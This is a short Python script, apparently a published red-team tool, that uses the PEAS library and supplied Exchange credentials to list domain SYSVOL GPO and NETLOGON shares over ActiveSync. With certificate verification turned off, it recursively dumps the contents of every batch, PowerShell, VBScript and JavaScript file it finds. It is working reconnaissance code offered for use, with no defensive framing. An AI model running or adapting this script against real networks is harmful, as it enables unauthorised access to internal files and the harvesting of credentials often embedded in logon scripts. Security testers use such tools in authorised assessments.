Enumerate GPO scripts from Exchange with F-Secure/PEAS

peas-gpo.py

import peas

client = peas.Peas()

client.disable_certificate_verification()

#### V CONFIG SECTION V ####


client.set_creds({
    'server': 'exch.domain.com',
    'user': 'user',
    'password': 'pass',
})

dc = "\\\\dc"
domain = "domain.local"

#### ^ CONFIG SECTION ^ ####


print "[peas-gpo] auth ", client.check_auth() 




searchbase = dc + "\\sysvol\\" + domain + "\\policies\\"
print "[peas-gpo] listing ", searchbase

def recurse_download(path):
    # print "[peas-gpo]: !recurse_listing listing:", path
    recurse_listing = client.get_unc_listing(path)

    for subitem in recurse_listing:
        if subitem['IsFolder'] == '1' and subitem["LinkId"] != path:
            # print "[peas-gpo] navigating subfolder", subitem["LinkId"] 
            recurse_download(subitem["LinkId"])
        elif any(ext in subitem["LinkId"] for ext in ('.bat', '.ps1', '.cmd', '.vbs', '.js')):
            print "[peas-gpo] dumping script", subitem
            print client.get_unc_file(subitem["LinkId"])



recurse_download(dc + "\\netlogon\\")

listing = client.get_unc_listing(searchbase)


for item in listing:
    if item["IsFolder"] == "1" and "{" in item["LinkId"]:
        print "[peas-gpo] enumerating GPO ", item["LinkId"][len(searchbase):]

        recurse_download(item["LinkId"])